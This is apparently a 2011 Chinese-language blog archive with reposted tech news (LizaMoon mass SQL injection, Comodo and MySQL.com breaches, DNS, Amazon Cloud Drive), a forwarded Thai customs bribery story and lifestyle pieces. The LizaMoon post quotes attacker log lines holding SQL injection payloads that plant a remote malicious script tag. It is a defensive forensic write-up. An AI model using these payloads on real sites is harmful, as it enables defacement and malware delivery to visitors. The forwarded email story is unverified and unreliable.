2011年3月31日 星期四

iPhone/iPad 免費應用程式(app)推薦網站,讓你免費 APP 載不完

不管你是用 Android 或是 iOS 系統的 iPad/iPhone 手機,買來一定要做一件事情,那就是下載應用程式 (APP) 來好好的玩一下囉!但是因為 App Store 上面許多好用的 app 通常都要付費,免費版功能又很機車的被作者給閹割掉,那到底要怎麼辦才能享用這些好用的 app 呢?

多數的人一定想到的是 JB 這招吧!這也是一個不錯的方法,但 JB 畢竟是非正規的做法,雖然可以規避掉原廠的一些限制,不過相對地就要自己承擔 JB 失敗的風險。不過,其實有許多 app 都會不定期推出限時免費的活動,只要善用一些免費 app 的介紹網站,不但可以取得最新 app 的資料,還可以追蹤限時免費的 app 唷!

正港本土,天天免費 – iapp

iapp 是目前台灣專門介紹 iOS 應用程式的網站中唯一一個每天提供限時免費 app 資訊的網站。網站的小編每天早上(假日好像是下午)會蒐集當天免費的 app 資訊,並且做一些簡單的測試、介紹後,統整成一篇文章 PO 出來分享給大家。除此之外,iapp 的小編們還會挑選一些不錯的 app 出來做專文介紹,對不想花太多時間搜尋 app 的朋友來說,可說是非常貼心的服務喔。

iapp_logo

網站名稱:iapp
網站網址http://iapp.com.tw/

iapp_rating

▲ 先看看網友的評分和評鑑報告,避免買到地雷 app。

iapp_description

▲ 限時免費 app 資訊,提供簡短的介紹

對岸的也很猛 - 愛Apps

愛Apps 是類似前面介紹的 iapp 的網站,不過因為是對岸的...內容當然就是簡體字為主啦!不過介紹的 app 倒是不用擔心,因為愛Apps 介紹的 app 也是以英文 app 為大宗,不必擔心介紹的都是阿陸仔的 app 啦。

不過比較特別的是愛Apps 有提供「特約限免」的分類,既然是「特約」那這些 app 主要都是當地開發商所提供的,如果想要找中文內容或者一些中華文化的 app,通常在這個分類裡面會比較容易找到。

iapps.im

網站名稱:愛Apps
網站網址http://www.iapps.im/

iapps.im_description

▲ 在下載的按鈕下方有以圖示顯示 app 適用的裝置類型

免費就找他 - AppShopper

AppShopper 是目前看過介紹 app 的網站中功能最齊全也最完整的。AppShopper 除了提供免費 app 的資訊外,還可以設定要追蹤價格的 app,如果看到喜歡的 app 但是卻太貴沒辦法下手的話,可以把 app 加入禮物清單 (Wishlist),當 app 降價或免費的時候,AppShopper 就會馬上通知你!

另外,AppShopper 還提供 iPhone 和 iPad 版的 app (也叫 AppShopper),如果你的 Wishlist 內的 app 有降價的話,AppShopper 就會馬上發送通知給你,完全掌握 app 價格變動的資訊。

appshopper_logo

網站名稱:AppShopper
網站網址http://appshopper.com/

 

appshopper_wishlist

▲ 把有興趣的 app 加入 wishlist,隨時追蹤 app 的現況

appshopper_app_list

▲ 提供完整的 app 變動資訊,無論更新、新上架、價格異動都會顯示

appshopper_badge

▲ 如果想追蹤 app 的話,點一下「Want It」就可以囉

appshopper_price_change

▲ app 的活動紀錄,可以清楚看到 app 價格變動的紀錄,隨時堵人 XD

 

限時是殘酷的,下手請快

app 的降價就像現實世界的拍賣會一樣,都是有限時的。在我們介紹的三個網站中,目前只有 AppShopper 網站上的資訊是系統化地在更新,其他兩個都是需要人工更新文章,所以要下載限時免費的 app 之前,務必要注意是否已經超過了免費的優惠時段,否則買錯了還要跟 Apple 說明原因才有辦法退款,都是麻煩。總之,要就快,否則眼睛就得睜大點囉!

無覓相關文章插件

驚見SQL Injection攻擊大海嘯-LizaMoon - 黑暗執行緒

資安廠商Websense在3/29發佈了一則消息,一個被命名為LizaMoon的SQL Injection攻擊正在席捲全球,已有許多網站遭受攻擊,網頁內容中被塞了<script src=」httq: // lizamoon . com / ur . php」>疑似掛馬連結,

透過Google查詢lizamoon. com關鍵字,被稙入惡意連結的URL數在兩天內由28,000個急速增加到380,000個(2011/03/31 22:00 UTC+8時的資料),有如海嘯狂掃(Websense說:  it makes it one of the bigger mass-injection attacks we have ever seen.),甚至iTune網站也名列其中。不過,依據分析iTune中出現的惡意連結已被HtmlEncode為&lt;script不至產生危害,並且推斷中鏢資料下載自其他資訊源,並非iTune本身受害,而加上HtmlEncode的處置也深得Websense讚許。(HtmlEncode真的很重要! 由ASP.NET 4特別為它提供更簡潔的新語法就知道它被呼叫的頻率該有多高,如果你不知道為何它與資安有關,不妨看一下ASP.NET防駭指南)

httq: // lizamoon. com / ur . php這個URL目前是無效的(該不會因為被太多植入連結網站DDoS打掛了吧? XD),但網站是活的。在它曾經有效的一段期間,ur.php會傳回一段Script將使用者導向一個著名的假冒防毒網站,不過該網站也掛點中。Websense調查了lizamoon. com的底細,發現它是3/25才用假資料註冊的,換句話說,這波攻擊只花了短短幾天就污染了超過38萬個網址(以URL計,非網站數),而且開始注入開始出現lizamoon以外的網域名稱的Script連結網址。

目前網路上找到的資料尚少,無從推斷太多攻擊細節,不過我在ASP.NET官方討論區的一個討論串倒是找到不少蛛絲馬跡...

My database was inserted a string like "</title><script src=http:// lizamoon. com / ur . php></script>". Event(Even?) the username field in aspnet_users table. So now I can't login my website if I use asp.net security. Who know about this problem please tell me what happening with my database or my website.

由開場白看來,連aspnet_users的username欄位都被注入惡意script連結,非常像古早前看過的游擊式SQL Injection攻擊,攻擊程式將全部SQL指令濃縮成一列,隨意嘗試連上有帶QueryString參數並夾帶攻擊用的SQL指令加在網址後方,一旦該網頁有SQL Injection漏洞,則附加於參數中的SQL指令就會被執行,查詢SQL Server的sysobjects, syscolumns,列出所有的文字欄位,並透過UPDATE指令在所有文字欄位都插入惡意script連結,一旦這些欄位被讀取顯示在前端,又未經HtmlEncode轉換,網頁中就會包含<script src="惡意Script" />,所有連上該網站的訪客,都會被迫載入惡意Script執行邪惡任務。相關的原理在游擊式SQL Injection攻擊一文中已有詳細解說楚,這裡不再贅述。

不過,更進一步檢視討論串,倒有了不同的結論:

  • Same for us. We cleaned the code yesterday, and moments ago... the same. (會反覆中鏢,表示攻擊程式不只一隻? 或是程式會持續攻擊?)
  • 幾個可疑IP: 95.64.9.18(來自羅馬尼亞), 91.217.162.45(來自烏克蘭,著名的邪惡網路)
  • 網友提供珍貴的IISLog(進行入侵鑑識時,這是超重要的線索)

    2011-03-11 16:34:45 W3SVC1746246233 *MYSERVERIP* GET /dir/linkdetail.aspx id=11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))-- 80 - 91.217.162.45 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0

    Doc.asp?id=PU12731+update+gCategoriasHistoricoTiposDescripciones+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一個字元一個字元組出</title><script src=httq:// lazemoon .com / ur . php></script>…%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- - 95.64.9.18 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) - 302 498

    2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一個字元一個字元組出</title><script src=httq:// lazemoon .com / ur . php></script>… %2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)

    由這些Log來看,惡意SQL會鎖定特定Table及欄位,不像上回觀察用sysobjects, syscolumns+CURSOR亂槍打鳥,顯示本次攻擊並非打了就跑,會先掌握資料庫Schema的資訊後再精準下手,所以前後應有多次存取(不知道為什麼要選擇這種做法,我還是覺得游擊式的玩法比較有創意,唯一的缺點是Table、欄位及資料很多時,執行起來耗時較久)

  • 3/31起出現了非LizaMoon的網域用來掛ur.php (tadygus . com, verhoef – training. co. uk, t6ryt56 . info) ,顯示透過防火牆封鎖lizamoon. com也無法社絕使用者誤連惡意網站的可能。

雖然對LizaMoon SQL Injection充滿好奇,但依目前蒐集到的資料就只能做出以上推測,如果有新的發展再做補充囉。

老話一句,大家千萬不要把SQL Injection寫進程式裡變成害網站裸奔的豬頭呀! 看不懂? 請參見這裡

2011年3月30日 星期三

Solidot | 三星在筆記本中植入鍵盤記錄程序

Mohamed Hassan在他的全新三星筆記本中發現了鍵盤記錄程序。第一次也許是意外,但兩次絕非巧合,他在兩個型號的三星筆記本中都找到了鍵盤記錄程序。他聯絡了三星技術支持,第一次對方否認;第二次給出新證據後對方換了口風,表示鍵盤記錄程序是用於“監視機器的性能,瞭解用戶如何使用機器”。換句話說,三星在未徵詢用戶許可的情況下收集了他們的使用數據。目前三星的公關拒絕對此事發表評論。

含狗…不意外!

資安表示: 不怕神一樣的對手... - 黑暗執行緒

資安表示: 不怕神一樣的對手...

接連看到三則資安新聞:

SQL Injection是老梗中的老梗,在資安界歷久彌新,但連資料庫MySQL的官方網站捅出這種簍子還真是諷刺。這也再次驗證: 不管你寫的是ASP、PHP還是JSP,連的是SQL、MySQL、Oracle、或是什麼怪DB,只要一個不小心,人人都可能變成害網站裸奔的北七。(再次呼龥,如果你的工作是寫與DB有關的程式,卻不知道什麼是SQL Injection,請發揮良心,即日起雙手打上石膏裝殘請長假,在搞懂它的殺傷力之前,別再寫半行Code)

再來看Comodo的憑證被盜用事件。Comodo是有名的的SSL憑證發行機構(Certificate Authority),CA自身的憑證被盜用,象徵惡意人士可假冒CA簽發特定網站的SSL憑證,由於是用真實的CA憑證所簽發,瀏覽器無從識別真假,唯一的補救之道是透過CRL(Certificate Revokation List)撤銷被冒名簽發的憑證,但這有賴於瀏覽器或接受憑證的程式主動取得CRL查驗憑證的有效性,若是程式偷懶省略了驗證步驟,就會誤信冒牌憑證,任由使用者連上惡意網站或被竊聽而不自知。舉個粗淺的例子,報導中提到mail.google.com也在受影響之列,如此駭客就可透過Man-In-The-Middle的攻擊手法,在使用者使用HTTPS連上mail.google.com時從中攔載竊聽,並使用假冒的mail.google.com SSL憑證再加密資料傳給使用者,若使用者的瀏覽器未進一步查驗假冒SSL憑證已被撤銷,則由使用者的觀點,使用HTTPS連上mail.google.com,傳回資料又經過有名CA,Comodo公司,簽發給mail.google.com網站的SSL憑證加過密,安全亳無瑕疵,事實上帳號、密碼、信件內容早已被看光光。(最近剛好有篇文章討論到類似的攻擊手法--不要錢的無線網路 -- 最貴)

掌控資安機制信任關鍵的CA居然發生此等管控疏失,令人搖頭,但有趣的事來了---一名伊朗駭客說:Comodo憑證被盜事件是我幹的! 依據該宣告內容,該名駭客是先入侵義大利一家SSL憑證經銷商InstantSSL.it的伺服器,取得完全控制權(FULL access)後找到一個TrudtDll.dll,發現它是用C#寫出用專門與CA簽發憑證API溝通的程式庫,經過反組譯,居然找到該經銷商連線GeoTrust與Comodo所用的帳號密碼,GeoTrust的API URL不能連,但Comodo的URL與經銷商帳號是有效的。駭客先生很自豪他在沒有文件的情況下,很快摸索出了AutoApplySSL與PickUpSSL兩組API的規格,並成功寫出透過這兩個API簽發SSL憑證的工具程式。宣告裡一再強調 "我好強 我好快 我好威 我好猛" "But I did it very very fast."(就尊敬他為"好快哥"吧!) 並聲稱自己只有21歲,感覺上還稚氣未脫,不是那種太陽穴隆起,目露精光的神人~~ XD (iTHome報導中說反組譯後找到"Comodo執行長與資料庫的帳號與密碼"似乎與宣告描述不符。)

總觀本次好快哥盜發Comodo憑證事件:

  • PKI機制有無重大瑕疵? 
    看來還夠可靠(事實是目前也找不到更好的替代品),但CRL機制需要客戶端程式主動驗證才會發揮效果,可能會因程式疏忽產生漏洞。
  • Comodo有無重大缺失?
    不確定。因為好快哥並沒有說自製的憑證簽發程式是放在InstantSSL.it的主機上執行(反正他說有FULL access權限),或是透過Internet就能隨意簽發憑證。若為前者,Comodo應無過失;若是後者就大有問題,簽發憑證API不鎖定來源IP,代表任何人只要取得經銷商帳號就可以在星巴克用免費無線網路生一張憑證出來,顯然不安全。
  • 誰是頭號戰犯?
    薑!薑!薑!薑! InstantSSL.it公司在本案獲頒最佳豬頭獎且當之無愧。伺服器被人攻破,程式檔案被看光光,依推測該伺服器應有具備由程式機制簽發憑證的能力,在主機已被入侵的前題下,不管經銷商帳號密碼是被Hardcode在DLL中,還是加密後寫在config裡,不管程式是用C#、Java還是組合語言寫,只要主機控制權失守,被破解只是時間早晚問題。

在資安神人Gary Hoglund落難記裡,Anonymous發動鄉民進行DDoS的部分無險可守,看來只能無奈承受,但有趣的是,駭客只靠著假造一封信"我人在國外,有急事要連回公司,請打開防火牆,root密碼設成xxxx"的社交攻擊,就騙倒IT經理,當場敞開大門,恭迎駭客大軍入城。

這幾個例子再次突顯資安工作脆弱難守的可悲特質,整個體系中只要有任何一個環節破損、發生一點人為疏忽,都會全面潰堤失守,經年累月耗資千萬打造的資安長城照樣瞬間化為烏有。十萬行的程式裡有一個漏洞跟有一百個漏洞的下場相同;一百個Developer裡只要有一個豬頭,系統照樣會萬刧不復;CA對自己的防護再嚴,只要有一家經銷商出錯,一樣假憑證滿天飛;資安神人主政的公司,警覺性不足的IT主管一時糊塗,就搞得公司搖搖欲墜;任憑各個交易網站與資安廠商苦心經營,用心規劃、細心管控,只要有幾匹害群之馬鬧出幾次入侵洩密風波,社會大眾就會對電子交易、資訊系統安全頓失信任感,形成推廣深化的障礙。

只能說,在這場資安攻防戰中,不怕神一樣的對手,只怕豬一樣的隊友...

深自提醒自己,只要從事資訊業一天,千萬千萬不要當上資安豬頭。

Which DNS Server Should You Use On Your Computer?

The job of a DNS server is to translate domain names (like google.com) into IP addresses (like 209.85.135.103) and it does this for every new new site that you visit in the browser. Therefore, no matter how fast your Internet connection speed is, a site won’t load unless the DNS server has performed the lookup successfully.

When it comes to choosing a DNS server, you’ve several choices. There are public DNS services like OpenDNS and Google DNS or you could use the DNS Server of your ISP itself. To find your current DNS server, type ‘ipconfig /all’ at the command prompt and look for the “DNS Server” entry under Ethernet adapter.

The speed at which a DNS server can resolve domain names into IP addresses depends on its geographic location among other factors. Therefore, for example, OpenDNS could be the fastest performing DNS server for a user in location A but Google DNS could be a better choice for another user in location B.

Compare DNS Speed

If you would like to know which is the fastest DNS Server for your computer, there’s a free utility called DNS Benchmark that can help. It will test the speed of all the popular DNS Services, including OpenDNS and Google DNS, from your computer and then arranges them in the decreasing order of performance.

The bars represent the average time it takes for a DNS service to resolve web domain names into their equivalent IP addresses and thus, the lower the better. DNS Benchmark is Windows-only but Namebench is a good option if you are on Linux or Mac. For some reason, I could not get Namebench to work on Windows 7. [via Cali Lewis]

One more thing..

Most DNS services offer resolvers at two IP address - for instance, Google DNS is available at 8.8.8.8 and 8.8.4.4 – and they are used in the same order in which they are listed in your network settings.

You should therefore look at the performance of individual DNS servers and set the “Preferred DNS Server" as the one that has the lowest score. In fact, you may also mix servers – like you can use Google Public DNS as the Preferred DNS server and OpenDNS as your Alternate DNS server.

The following video describes how you may change the DNS settings on your computer:

' + google_ads[i].line1 + '' + google_ads[i].visible_url + '
' + google_ads[i].line2 + ' ' + google_ads[i].line3 + ' '; if (i   '; } u = '
Ads by Google ' + u + '
'; } google_adnum = google_adnum + google_ads.length; document.write(u); return; } google_ad_client='pub-3152670624293746';google_ad_output = 'js';google_ad_type = 'text';google_feedback = 'on';google_language = 'en';google_encoding = 'utf8'; google_max_num_ads = '2'; google_ad_channel='4355338828';google_skip=google_adnum;

2011年3月29日 星期二

民工和作家

2003年的春節前,我坐出租車從北京的A點去B點。路過一處工地,車停了下來。司機說:前面的路堵了。在一個幾乎沒車的地方出現堵車,是一件很奇怪的事情。很快事情就明了,是一群被拖欠工資的民工把路堵了。要過春節了,辛辛苦苦碼了一年磚的民工,工資還沒拿到手,怎麼回家吃飯?然後我做了一個夢:

一個包工頭站出來說:我就不想付。

底下的人大聲喊道:草泥馬!揍死他!

然後有個聲音說道:等等,讓他說為什麼不想付再揍不遲。

包工頭說:幹我們這一行的,沒聽說過誰按時按量付工錢阿,都這樣。你不愛在我這裡干,你去別的地方干啊?抱怨個球啊,要怪就怪,你們生在中國。草泥們馬!

底下憤怒的喊:草…泥…馬…!

然後上來一群人就開始掄拳頭,搧耳光。

包工頭慫了,開始討饒:不是我不想付,是我也沒錢付阿。施工方的錢沒打過來,上下過春節都要打點,我自己還有二奶三奶七八奶要養活,哪有錢給你們啊?請原諒我傷害了你們的感情。

一陣紛亂的拳頭耳光聲…

2011年的春節後,我做夢坐出租車從北京C點去D點。路過中關村,前面又堵車。我決定在車裡打盹,中關村不堵車才稀奇。可是出租司機激動了:馬勒戈壁,前面一群作家把路攔上了,找“白讀”網要稿費。

司機跳下車,對著那群作家喊道:你們腦子進水啦?人名字就叫“白讀”,你們還找人要什麼錢?

堵在車流裡的廣大群眾鼓掌支持:我們都愛“白讀”。

作家們聲淚俱下:我們辛辛苦苦碼了一年字,總得掙點錢吧,不然,怎麼回家吃飯啊?

一個群眾笑道:這年頭,沒聽說過誰讀電子書還付錢的,都這樣。你們有本事去美國用英文寫作啊,那裡有腦子進水的人看電子書還花錢。你們別抱怨了,誰叫你們只會中文,是中國作家呢?誰叫你們生在中國呢?

群眾們呼應:說得好!

作家們說:有點同情心吧,我們已經很窘迫了。

另一個群眾說:你們窘迫,你們怎麼不想想我們有多窘迫?那邊日本地震,這邊又說日用品要漲價,這個月工資剛發下來就得又買鹽又搶洗衣粉,車貸房貸要還,還有一家老小要養活,哪有錢買書看?

群眾們呼應:說得太好了!

夢醒後,我想起了華盛頓的大屠殺紀念館上刻著的這段很著名的話:

起初他們追殺共產主義者,我沒有說話-因為我不是共產主義者;後來他們追殺工會成員,我沒有說話-因為我不是工會成員;接著他們追殺猶太人,我沒有說話-因為我不是猶太人;最後他們奔我而來,卻再也沒有人站出來為我說話了。

記住,你也許就是下一個民工或者作家。記住,千萬不要在嫉惡如仇的同時也助紂為虐。

起初他們追殺共產主義者,我沒有說話-因為我不是共產主義者;後來他們追殺工會成員,我沒有說話-因為我不是工會成員;接著他們追殺猶太人,我沒有說話-因為我不是猶太人;最後他們奔我而來,卻再也沒有人站出來為我說話了。

Mysql.com Website hacked by SQL Injection |

Mysql.com Website compromised by SQL Injection

March 29th, 2011

As bizarre as it can be, believe it or not, MySQL.com has been hacked and a part of the database containing member and employee email addresses, usernames and passwords has been published by the hackers on Pastebin.com.

The compromise has garnered quite an interest from the security community for two simple reasons.

For one, it seems that MySQL.com (and MySQL.fr, MySQL.de and MySQL.it) servers have been targeted with a blind SQL injection attack by two hackers that go by “TinKode” and “Ne0h”. According to Techie Buzz, it is possible that an XSS vulnerability affecting MySQL.com – discovered and submitted by TinKode back in January – has also been used in the attack.

Details of the blind SQL injection vulnerability have been revealed in an email sent to the Full-Disclosure mailing list.

Secondly, the login credentials revealed in the published part of the database have demonstrated that MySQL employees are not big fans of strong passwords. For example, Robin Schumacher, MySQL’s Director of Product Management, uses a simple four digit password for WordPress. A number of other accounts have “qa” as a password.

Sun, MySQL’s parent company, has also been attacked by the same hackers. The targeted websites are www.reman.sun.com and www.ibb.sun.com, and they also proved to be vulnerable to a SQL injection attack. Whether they exploited the same vulnerability that compromised MySQL.com, they didn’t say. The hackers again published some of the gathered information, but this time they didn’t make login credentials public.

 

Source: Help Net Security (Language: United States) Licença Creative Commons

 

Share |

 

真糗!

一位友人寄的

遊泰國 ~ 一定要看!

 

出境時泰國海關人員竟然光明正大的伸手向我索賄

 

原因是:他的意思是說我的行李超重,要拆開來看一下

原本我不給,同團的朋友說:算了! 給他一點好了

我就把剩下的泰國錢 全給他了,大約合台幣 2,3百

那個海關的人竟然不要,他竟指定要美金100元

因為他還拿一張美金100元讓我看一下

後來我就大叫領隊過來,領隊和他溝通了一下

於是泰國海關的人就說:我的行李要拿到房間裡面特別檢查

還好,領隊堅持不行,後來領隊告訴我:

拿進去檢查就完蛋了!因為就會被泰國海關人員塞毒品進去吧!

 

所以,以下這則新聞 我想一定是泰國海關人員刻意栽贓的

所以,從那次以後,我發誓我再也不會去泰國觀光

否則一輩子就完了

 

 

ps: 當時領隊陳建鴻( 鳳凰旅遊 )感謝您了!

 

不是你的行李不要亂碰亂拿喔 , 必看

 

國人李進益去年 7月30日自泰國曼谷返國,在通關經過隨身行李X光機時,在其行李後面有一個手提包無人認領(有人故意放的),

 

李進益被泰國女警(嫁禍)叫住,以為是女警因為行李太重,請他幫忙將行李拿下來 ,李進益將行李拿下放在地下之後,就轉身拿著自己的行李登機 ,不料卻因此被泰國警方依攜帶含有安非他命的減肥藥逮捕,其間還向他索賄400 萬元泰銖(約 323 萬台幣)他被關了一年多才 釋放。

 

國民黨立委楊麗環舉行記者會,揭發泰國司法黑幕,楊麗環指出,毒品已經成為東南亞很多國家陷害國人、索賄的理由,國人出國在外必須相當小心 ? (為什麼台灣政府沒有大力宣傳告知國人)

 

外交部亞太司秘書胡志堅則表示,我國目前共有67人遭泰國監禁,其中47人都是因為毒品案件,外交部也知道泰國索賄的問題,但是不便介入。(不介入沒關係.為什麼台灣政府外交部沒有大力宣傳告知國人).(我們真的是一個國家..?政府在那裡(民意代表你們又在那裡…???????)

 

李進益在記者會中現身說法,表示自己因為在泰國經商,被當地警察索賄很多,知道泰國警察的作法,必須要順著對方的意思,原本他已經過了X光機,向前走了 5、6步,卻被女警兇惡的叫住,他因為不懂泰文,以為是對方要他把行李拿下來,他就轉身把行李拿下放在地上(錯誤),隨即拿起自己的行李登機。

 

 

不料,隨後泰國警察就登機將他逮捕,原因是他所拿下的行李中滿了含有安非他命成分的減肥藥(不是你的行李請勿拿.上面沒你的手指紋.但是他可能還是會嫁禍於你),雖然他沒有把行李帶走,但警方仍舊認定行李是他的,不採信他的辯解,隨即將他押往監獄拘禁。

 

 

李進益說: 進了監獄之後,當地的商務代表處隨即前往關心,並行文泰國警務廳要求把他腳鐐拿掉,別國的人民在行文之後都可以拿掉腳鐐 ,但因為我們與泰國沒有邦交(因為台灣不是聯合國承認的國家),泰國根本不理,他腳鐐一直戴了5個多月才拿掉,期間泰國警方還向他索賄,要求 5萬泰銖即可拿掉腳鐐。

 

李進益哽咽的說出國人在泰國遭到不平等的待遇,每個月還得付3000,才能吃到一天兩餐,食物連豬狗吃的都不如。

 

李進益遭拘禁期間,泰國警方還向他開價400萬泰銖。由於堅持自己沒有犯罪,李進益屢次在泰國法庭上要求法官向泰國緝毒警察局索取現場錄影帶證明自己的清白,緝毒組卻以證人、證據未到等理由,前後13次要求法院延期審理,直到今年 8月2日才將錄影帶送到法官手中,法院在 9 月 3 日 開庭之後, 判決李進益當庭無罪釋放。

 

而泰國警方在釋放李進益時,不僅沒有任何冤獄賠償(台灣人的悲哀),連他入獄時交給獄方保管的勞力士錶、護照、現金等財物都不翼而飛。

 

請各位用力傳閱 ! ! 不是只有廣傳.

 

唯一的方法就是透過網路告知全台灣人.包括全世界的台灣人.


三萬薪水與六萬薪水

不論你的薪水如何?

快樂做自已最重要.

這個比較非常有創意,不失一個可以深思的題目。

新竹VS新屋

上個月我搬回新屋當司機了,月薪三萬。

一個電機碩士放下新竹科學園區月薪六萬去幫人家開車?

哈!我的同學都在笑我。

在新竹,我買一間二手透天厝要800萬,貸600萬+200萬自備。

在新屋,我買一間全新透天厝只要350萬,貸150萬+200萬自備。

 

新竹,我負債600萬,每個月要繳房貸3萬7。

在新屋,我負債150萬,每個月要繳房貸9仟3。

在新竹,上班為了怕塞車,6:30起床,下雨天運氣不好,在塞車的車陣中塞1個小時,心裡也幹譙了一個小時。

在新屋,我8:00起床,開車十分鐘到公司。

在新竹每天7:00出門,22:00回到家,每天在外15個小時,為了那600萬負債,所以我用青春去拚那六萬的薪水。

在新屋每天8:15出門,17:15到家,我可以在家吃飯,晚上做我想做的事,因為我負債只有150萬。

同學問我薪水會不會不夠用?

在新竹,繳完房貸,我剩下2萬5。

在新屋,繳完房貸,我剩下2萬,只差五仟。

新竹的新貴因園區而發達,新竹房地產因新貴而發達,新貴的錢最後吐給房地產,自己卻要拚死拚活去工作。

這樣的生活,真不知是錢的主人,還是被錢所奴役?

房貸20年,人生有幾個20年,一生中若有10年在新竹園區工作生活,真的,不如歸去!

這篇文章看來好笑但卻很實際,記得早年一些像警察、老師...等等的公務人員,很多人都希望能夠調派到大都市裡,不過現在情況不太一樣了,不少人現在反而希望能夠調派到小鄉鎮(當然不是偏遠地區啦!),因為生活機能不會差很多,但消費、生活步調卻是差個十萬八千里,重點是:公務人員到哪薪水都一樣啊!(除非階級不同)

何必留在業務量大的大都市裡咧?

就算不是公務人員,到了小鄉鎮薪水比不上在大都市的水準,但由於相對的消費也降低,所以能存下來活用的錢不見得會比在大都市裡少,也就是:「賺多少不是重點,能留下多少才是關鍵!」

只是我們似乎常常不能跳脫薪水條上數字的迷思,做了看起來不錯,但其實本益比不怎麼理想的事情。

 

P.S出處:Email

     作者:莉安朋友

10 Office Pranks Perfect for April Fools’ Day

Ah, April Fools’ Day. That dreaded day of the year that news editors and the gullible public love to hate. While we can’t wait to see what amusing pranks the likes of Google are cooking up, you can plot your own fun in the meantime.

We’ve got 10 suggestions, ranging from vintage classics to more up-to-date tricks that you can play on your colleagues, friends and frenemies.

If your office has a good sense of humor and you’re looking for a bit of light-hearted, harmless fun this April 1, take a look through the gallery for our ideas and please share your own suggestions in the comments box below.

View As Slideshow »
1. Speech Recognition
2. Crossed Wires
3. Quick Change
4. Fun with Mice
5. Hunt the Paper Clip
6. This Stall is Occupied
7. BSoD
8. Can You Hear That?
9. Wrong Number
10. Just Smirk it Out

Thumbnail image courtesy of iStockphoto, kutaytanir, gallery images courtesy of Flickr, Josh Derr, Kate, jrpinky_boi, Daniele Pieroni, jessi, Eric P, Josh Liba, Ren Adams, Martin Pettitt and Tricia

Amazon Gives You 5 GB of Storage Space for Free

Amazon Cloud Drive

Amazon today unveiled a new storage service called Amazon Cloud Drive that gives you 5 GB of free online storage space to store your documents, photos, music and other files securely in the cloud. All you need is a free Amazon.com account to upload your files which you can then access from anywhere using a web browser.

Amazon Cloud Drive is purely an online file storage solution and the only client that you can use to upload or download files from your Cloud Drive account is your web browser.

Thus, for example, if you plan to copy your entire My Documents folder from the computer to Amazon’s cloud, you’ll have to upload files manually from the browser, one by one. Or, to save time, you could zip the entire folder into a single file and upload it in one go as Cloud Drive supports files as large as 2 GB in size. (Dropbox has a file size limit of 300 MB).

Amazon offers a handy desktop client that will scan your hard drive for music related files and will automatically put them to Cloud Drive - you then listen to your music from anywhere using the browser itself without having to download anything to that computer. Other than that, I think the Cloud Drive service is also good for manually backing up some of your really bulky files online - like those Outlook PSTs.

Pricing - Amazon Cloud Drive vs Amazon S3

Amazon S3 vs Amazon Cloud Drive

There’s however one part about Cloud Drive that has surprised me a bit – the pricing structure. The service internally uses Amazon S3 for storage but if you compare the storage cost of these two services, you’ll find that Amazon S3 is nearly 80% more expensive than Cloud Print.

Amazon charges 14¢ per month per GB for S3 which converts to around $1.78 per year (including the 10¢ data transfer fee) while Cloud Drive is available for a flat $1 per GB per year with no transfer-in or transfer-out fees. S3 is one of the popular choices for online backup but going forward, Cloud Print could be a more cost-efficient option.

Bonus Tip – Upgrade to 20 GB for less than $1

All Amazon Cloud Drive users get 5 GB of free online storage space or you can pay $20 to upgrade to the 20 GB plan.

There’s another option as well. Amazon will upgrade your storage to 20 GB if you buy any MP3 Album from them. Now there are quite a few music albums on Amazon.com that are available for less than $1 – buy any one and you’ll be upgraded to 20 GB.

The only downside is that while Cloud Drive is available to everyone worldwide, Amazon’s music store is only for residents of the United States with a U.S. billing address.

' + google_ads[i].line1 + '' + google_ads[i].visible_url + '
' + google_ads[i].line2 + ' ' + google_ads[i].line3 + ' '; if (i   '; } u = '
Ads by Google ' + u + '
'; } google_adnum = google_adnum + google_ads.length; document.write(u); return; } google_ad_client='pub-3152670624293746';google_ad_output = 'js';google_ad_type = 'text';google_feedback = 'on';google_language = 'en';google_encoding = 'utf8'; google_max_num_ads = '2'; google_ad_channel='4355338828';google_skip=google_adnum;

Evernote (Finally) Updates Its Web Interface

The Web version also features Notebook Stacks (so you can easily group your Notebooks), a Snipper view (so you can see contents without having to actually open a note), and Autosave.

The Changing (And Growing!) Evernote Demographic

CEO Phil Libin says that only 13% of Evernote users currently use the Web version, and with those statistics in mind, it does make sense that this was the last app for the company to redesign.

But Libin notes that since Evernote's launch, its demographics have shifted substantially. No longer is Evernote solely used by professionals (professionals with their fancy smartphones and native apps, that is). The tool is becoming used by more and more students. For many of them, that means using the Web version - not simply because they're accessing Evernote via the computer lab, but because (and please take note here developers) they don't download software and they prefer the browser.

This update also adds a new feature to Evernote: the ability to share individual notes over Facebook and email. Users will be able to share a note with others - in the words of Libin "share your private brain with the social brain."

The addition of a Facebook share mechanism comes pretty late in the game for Evernote. While startups are often told to include viral loops like Facebook, Evernote has hardly needed such a thing. The company is adding over 26,000 new users a day. Nonetheless, the ability to share notes to a Facebook wall or to a Facebook group will likely only serve to help boost that growth.

evernote_web_new7.jpg

2011年3月28日 星期一

春日美彩挑戰最低價↘再免運

台電一直不敢說的秘密, 關於跳電 @ maymay的國境 :: 隨意窩 Xuite日誌

每當一到夏季用電尖峰總是會跳電

而台電卻遲遲不敢公佈跳電原因


因跳電的原因真的令人難以置信


就算公佈出來可能會引起騷動.恐慌~


但在這人肉搜索的社會裡


往往越是隱匿就越會出事


真相往往還是會被搜索出來


現在,就在這裡公佈每當夏季用電高峰時


台電總是會在緊要關頭來給你跳電一下的真正原因


請做好心理準備,以免
................... 
 
 

